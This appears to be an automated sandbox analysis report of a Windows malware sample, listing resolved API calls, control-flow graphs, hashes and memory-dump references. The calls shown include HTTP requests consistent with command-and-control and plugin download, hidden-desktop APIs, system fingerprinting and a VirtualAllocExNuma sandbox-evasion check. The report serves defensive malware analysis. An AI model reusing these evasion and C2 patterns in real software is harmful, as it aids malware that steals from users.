                        • GetProcAddress.KERNEL32(70460000,015EE8F0), ref: 00926C7E
                        • GetProcAddress.KERNEL32(70460000,015D5548), ref: 00926C97
                        • GetProcAddress.KERNEL32(70460000,015D54A8), ref: 00926CAF
                        • GetProcAddress.KERNEL32(70460000,015EE908), ref: 00926CC7
                        • GetProcAddress.KERNEL32(768D0000,015D5588), ref: 00926CE3
                        • GetProcAddress.KERNEL32(768D0000,015D55E8), ref: 00926CFB
                        • GetProcAddress.KERNEL32(768D0000,015EE8D8), ref: 00926D14
                        • GetProcAddress.KERNEL32(768D0000,015EE7D0), ref: 00926D2C
                        • GetProcAddress.KERNEL32(768D0000,015D53E8), ref: 00926D44
                        • GetProcAddress.KERNEL32(75790000,015DA4B0), ref: 00926D64
                        • GetProcAddress.KERNEL32(75790000,015DA870), ref: 00926D7C
                        • GetProcAddress.KERNEL32(75790000,015EE920), ref: 00926D95
                        • GetProcAddress.KERNEL32(75790000,015D5468), ref: 00926DAD
                        • GetProcAddress.KERNEL32(75790000,015D5728), ref: 00926DC5
                        • GetProcAddress.KERNEL32(75790000,015DA910), ref: 00926DDE
                        • GetProcAddress.KERNEL32(75A10000,015EE7E8), ref: 00926DFE
                        • GetProcAddress.KERNEL32(75A10000,015D5608), ref: 00926E16
                        • GetProcAddress.KERNEL32(75A10000,015E8AC8), ref: 00926E2F
                        • GetProcAddress.KERNEL32(75A10000,015EE938), ref: 00926E47
                        • GetProcAddress.KERNEL32(75A10000,015EE878), ref: 00926E5F
                        • GetProcAddress.KERNEL32(75A10000,015D5488), ref: 00926E78
                        • GetProcAddress.KERNEL32(75A10000,015D55C8), ref: 00926E90
                        • GetProcAddress.KERNEL32(75A10000,015EE788), ref: 00926EA8
                        • GetProcAddress.KERNEL32(75A10000,015EE800), ref: 00926EC1
                        • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 00926ED7
                        • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 00926EEE
                        • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 00926F05
                        • GetProcAddress.KERNEL32(76850000,015D5688), ref: 00926F21
                        • GetProcAddress.KERNEL32(76850000,015EE818), ref: 00926F39
                        • GetProcAddress.KERNEL32(76850000,015EE830), ref: 00926F52
                        • GetProcAddress.KERNEL32(76850000,015EE848), ref: 00926F6A
                        • GetProcAddress.KERNEL32(76850000,015EE860), ref: 00926F82
                        • GetProcAddress.KERNEL32(75690000,015D55A8), ref: 00926F9E
                        • GetProcAddress.KERNEL32(75690000,015D56A8), ref: 00926FB6
                        • GetProcAddress.KERNEL32(769C0000,015D56E8), ref: 00926FD2
                        • GetProcAddress.KERNEL32(769C0000,015EE890), ref: 00926FEA
                        • GetProcAddress.KERNEL32(6F8C0000,015D5708), ref: 0092700A
                        • GetProcAddress.KERNEL32(6F8C0000,015D5388), ref: 00927022
                        • GetProcAddress.KERNEL32(6F8C0000,015D5408), ref: 0092703B
                        • GetProcAddress.KERNEL32(6F8C0000,015EE320), ref: 00927053
                        • GetProcAddress.KERNEL32(6F8C0000,015D5628), ref: 0092706B
                        • GetProcAddress.KERNEL32(6F8C0000,015D5648), ref: 00927084
                        • GetProcAddress.KERNEL32(6F8C0000,015D53A8), ref: 0092709C
                        • GetProcAddress.KERNEL32(6F8C0000,015D5508), ref: 009270B4
                        • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 009270CB
                        • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 009270E2
                        • GetProcAddress.KERNEL32(75D90000,015EE428), ref: 009270FE
                        • GetProcAddress.KERNEL32(75D90000,015E8C78), ref: 00927116
                        • GetProcAddress.KERNEL32(75D90000,015EE188), ref: 0092712F
                        • GetProcAddress.KERNEL32(75D90000,015EE350), ref: 00927147
                        • GetProcAddress.KERNEL32(76470000,015D53C8), ref: 00927163
                        • GetProcAddress.KERNEL32(6EBB0000,015EE1E8), ref: 0092717F
                        • GetProcAddress.KERNEL32(6EBB0000,015D5528), ref: 00927197
                        • GetProcAddress.KERNEL32(6EBB0000,015EE260), ref: 009271B0
                        • GetProcAddress.KERNEL32(6EBB0000,015EE2D8), ref: 009271C8
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                        • API String ID: 2238633743-3468015613
                        APIs
                        • lstrlen.KERNEL32(0092CFEC), ref: 0091F1D5
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F1F1
                        • lstrlen.KERNEL32(0092CFEC), ref: 0091F1FC
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F215
                        • lstrlen.KERNEL32(0092CFEC), ref: 0091F220
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F239
                        • lstrcpy.KERNEL32(00000000,00934FA0), ref: 0091F25E
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F28C
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F2C0
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F2F0
                        • lstrlen.KERNEL32(015D5248), ref: 0091F315
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00920013
                        • lstrlen.KERNEL32(0092CFEC), ref: 009200BD
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009200E1
                        • lstrlen.KERNEL32(0092CFEC), ref: 009200EC
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00920110
                        • lstrlen.KERNEL32(0092CFEC), ref: 0092011B
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0092013F
                        • lstrlen.KERNEL32(0092CFEC), ref: 0092015A
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00920189
                        • lstrlen.KERNEL32(0092CFEC), ref: 00920194
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009201C3
                        • lstrlen.KERNEL32(0092CFEC), ref: 009201CE
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00920206
                        • lstrlen.KERNEL32(0092CFEC), ref: 00920250
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00920288
                        • lstrcpy.KERNEL32(00000000,?), ref: 0092059B
                        • lstrlen.KERNEL32(015D5048), ref: 009205AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 009205D7
                        • lstrcat.KERNEL32(00000000,?), ref: 009205E3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0092060E
                        • lstrlen.KERNEL32(015EFBE0), ref: 00920625
                        • lstrcpy.KERNEL32(00000000,?), ref: 0092064C
                        • lstrcat.KERNEL32(00000000,?), ref: 00920658
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00920681
                        • lstrlen.KERNEL32(015D5028), ref: 00920698
                        • lstrcpy.KERNEL32(00000000,?), ref: 009206C9
                        • lstrcat.KERNEL32(00000000,?), ref: 009206D5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00920706
                        • lstrcpy.KERNEL32(00000000,015E8C38), ref: 0092074B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901557
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901579
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0092077F
                        • lstrcpy.KERNEL32(00000000,015EFAC0), ref: 009207E7
                        • lstrcpy.KERNEL32(00000000,015E89F8), ref: 00920858
                        • lstrcpy.KERNEL32(00000000,fplugins), ref: 009208CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00920928
                        • lstrcpy.KERNEL32(00000000,015E88C8), ref: 009209F8
                          • Part of subcall function 009024E0: lstrcpy.KERNEL32(00000000,?), ref: 00902528
                          • Part of subcall function 009024E0: lstrcpy.KERNEL32(00000000,?), ref: 0090254E
                          • Part of subcall function 009024E0: lstrcpy.KERNEL32(00000000,?), ref: 00902577
                        • lstrcpy.KERNEL32(00000000,015E8A98), ref: 00920ACE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00920B81
                        • lstrcpy.KERNEL32(00000000,015E8A98), ref: 00920D58
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID: fplugins
                        • API String ID: 2500673778-38756186

                        Control-flow Graph (graph image not reproduced; entry block 906c40, blocks calling InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile and InternetCloseHandle, executed/not-executed marking omitted)
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00906C6F
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00906CC2
                        • InternetOpenA.WININET(0092CFEC,00000001,00000000,00000000,00000000), ref: 00906CD5
                        • StrCmpCA.SHLWAPI(?,015F0268), ref: 00906CED
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00906D15
                        • HttpOpenRequestA.WININET(00000000,GET,?,015EFB80,00000000,00000000,-00400100,00000000), ref: 00906D50
                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00906D77
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00906D86
                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00906DA5
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00906DFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00906E5B
                        • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00906E7D
                        • InternetCloseHandle.WININET(00000000), ref: 00906E8E
                        • InternetCloseHandle.WININET(?), ref: 00906E98
                        • InternetCloseHandle.WININET(00000000), ref: 00906EA2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00906EC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Similarity
                        • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                        • String ID: ERROR$GET
                        • API String ID: 3687753495-3591763792
                        • Opcode ID: 6d03158dd3fecc71fc91f9becb4bd1afdd7323f08b547c452650de43fe0710a7
                        • Instruction ID: 36be22f88420def261b948a4001d092f1de17d1babf96589fb5cbe24711720d2
                        • Opcode Fuzzy Hash: 6d03158dd3fecc71fc91f9becb4bd1afdd7323f08b547c452650de43fe0710a7
                        • Instruction Fuzzy Hash: 18817C76A41315AFEB20DFA4DC89FAEB7B8AF44700F144468F945E72C0DB70AD558B90
                        APIs
                        • lstrlen.KERNEL32(015D5248), ref: 0091F315
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091F3A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091F3C7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091F47B
                        • lstrcpy.KERNEL32(00000000,015D5248), ref: 0091F4BB
                        • lstrcpy.KERNEL32(00000000,015E8B88), ref: 0091F4EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091F59E
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0091F61C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091F64C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091F69A
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0091F718
                        • lstrlen.KERNEL32(015E8C28), ref: 0091F746
                        • lstrcpy.KERNEL32(00000000,015E8C28), ref: 0091F771
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091F793
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091F7E4
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0091FA32
                        • lstrlen.KERNEL32(015E8C68), ref: 0091FA60
                        • lstrcpy.KERNEL32(00000000,015E8C68), ref: 0091FA8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091FAAD
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091FAFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: bc97bf1c9fdc2158746ad84cc3a6574cf7f46c270dc585a18f1626e1da101168
                        • Instruction ID: 529cf1689491f81e7efe8b5ad77c009240baf76305f98b5e0cd8ae19c8ce6409
                        • Opcode Fuzzy Hash: bc97bf1c9fdc2158746ad84cc3a6574cf7f46c270dc585a18f1626e1da101168
                        • Instruction Fuzzy Hash: 85F13F70B01609DFCB24CF69D968A99B7E9BF44314B2881BDD419AB2A1DB75DC82CF40

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2721 918ca0-918cc4 StrCmpCA 2722 918cc6-918cc7 ExitProcess 2721->2722 2723 918ccd-918ce6 2721->2723 2725 918ee2-918eef call 902a20 2723->2725 2726 918cec-918cf1 2723->2726 2727 918cf6-918cf9 2726->2727 2729 918ec3-918edc 2727->2729 2730 918cff 2727->2730 2729->2725 2766 918cf3 2729->2766 2732 918d30-918d3f lstrlen 2730->2732 2733 918e56-918e64 StrCmpCA 2730->2733 2734 918d5a-918d69 lstrlen 2730->2734 2735 918dbd-918dcb StrCmpCA 2730->2735 2736 918ddd-918deb StrCmpCA 2730->2736 2737 918dfd-918e0b StrCmpCA 2730->2737 2738 918e1d-918e2b StrCmpCA 2730->2738 2739 918e3d-918e4b StrCmpCA 2730->2739 2740 918d84-918d92 StrCmpCA 2730->2740 2741 918da4-918db8 StrCmpCA 2730->2741 2742 918d06-918d15 lstrlen 2730->2742 2743 918e88-918e9a lstrlen 2730->2743 2744 918e6f-918e7d StrCmpCA 2730->2744 2760 918d41-918d46 call 902a20 2732->2760 2761 918d49-918d55 call 902930 2732->2761 2733->2729 2756 918e66-918e6d 2733->2756 2745 918d73-918d7f call 902930 2734->2745 2746 918d6b-918d70 call 902a20 2734->2746 2735->2729 2749 918dd1-918dd8 2735->2749 2736->2729 2750 918df1-918df8 2736->2750 2737->2729 2751 918e11-918e18 2737->2751 2738->2729 2752 918e31-918e38 2738->2752 2739->2729 2753 918e4d-918e54 2739->2753 2740->2729 2748 918d98-918d9f 2740->2748 2741->2729 2754 918d17-918d1c call 902a20 2742->2754 2755 918d1f-918d2b call 902930 2742->2755 2758 918ea4-918eb0 call 902930 2743->2758 2759 918e9c-918ea1 call 902a20 2743->2759 2744->2729 2757 918e7f-918e86 2744->2757 2779 918eb3-918eb5 2745->2779 2746->2745 2748->2729 2749->2729 2750->2729 2751->2729 2752->2729 2753->2729 2754->2755 2755->2779 2756->2729 2757->2729 2758->2779 2759->2758 2760->2761 2761->2779 2766->2727 2779->2729 2780 918eb7-918eb9 2779->2780 2780->2729 2781 918ebb-918ebd lstrcpy 2780->2781 2781->2729
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: c9b40495230f6cae81528eded9ea1ea939e89644469eb355d7c858014e2af618
                        • Instruction ID: 781748ac2a06ee556c8e1d91a73de74756a7be551348f31b8b9671ee62b13415
                        • Opcode Fuzzy Hash: c9b40495230f6cae81528eded9ea1ea939e89644469eb355d7c858014e2af618
                        • Instruction Fuzzy Hash: 15515E70B047099FC720AF75DD89AAF7AF8AB44704B104C1DE452D7650DFB8E981AF61

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2782 922740-922783 GetWindowsDirectoryA 2783 922785 2782->2783 2784 92278c-9227ea GetVolumeInformationA 2782->2784 2783->2784 2785 9227ec-9227f2 2784->2785 2786 9227f4-922807 2785->2786 2787 922809-922820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 922822-922824 2787->2788 2789 922826-922844 wsprintfA 2787->2789 2790 92285b-922872 call 9271e0 2788->2790 2789->2790
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0092277B
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,009193B6,00000000,00000000,00000000,00000000), ref: 009227AC
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0092280F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00922816
                        • wsprintfA.USER32 ref: 0092283B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                        • String ID: :\$C
                        • API String ID: 2572753744-3309953409
                        • Opcode ID: 65f6bee859ab3c84874be848bf52fba3b00da98cfd64c29ca42fab4dda7c1aa6
                        • Instruction ID: 0c07c8a8d935b4654e02c4e05310ea52dd952007548dcc9c39e7554f090dd00a
                        • Opcode Fuzzy Hash: 65f6bee859ab3c84874be848bf52fba3b00da98cfd64c29ca42fab4dda7c1aa6
                        • Instruction Fuzzy Hash: 3D3170B1D08219ABCB14CFB89985AEFFFBCEF58710F100169E505F7654E6349B408BA2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2793 904bc0-904bce 2794 904bd0-904bd5 2793->2794 2794->2794 2795 904bd7-904c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 902a20 2794->2795
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00904BF7
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00904C01
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00904C0B
                        • lstrlen.KERNEL32(?,00000000,?), ref: 00904C1F
                        • InternetCrackUrlA.WININET(?,00000000), ref: 00904C27
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Similarity
                        • API ID: ??2@$CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1683549937-4251816714
                        • Opcode ID: 284dc16b56891d549cd5702f856d51bc41d8d257cc093c30b859e7748ba6cdb8
                        • Instruction ID: b9290a1c421e7eba87d7d812946683e4e1d09b5e26af5ad8df7969b44331f00b
                        • Opcode Fuzzy Hash: 284dc16b56891d549cd5702f856d51bc41d8d257cc093c30b859e7748ba6cdb8
                        • Instruction Fuzzy Hash: 1F011B71D00218AFDB10DFA8EC45B9EBBA8AB48320F104526F914E7290EF7459058FD5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2798 901030-901055 GetCurrentProcess VirtualAllocExNuma 2799 901057-901058 ExitProcess 2798->2799 2800 90105e-90107b VirtualAlloc 2798->2800 2801 901082-901088 2800->2801 2802 90107d-901080 2800->2802 2803 9010b1-9010b6 2801->2803 2804 90108a-9010ab VirtualFree 2801->2804 2802->2801 2804->2803
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00901046
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 0090104D
                        • ExitProcess.KERNEL32 ref: 00901058
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0090106C
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 009010AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
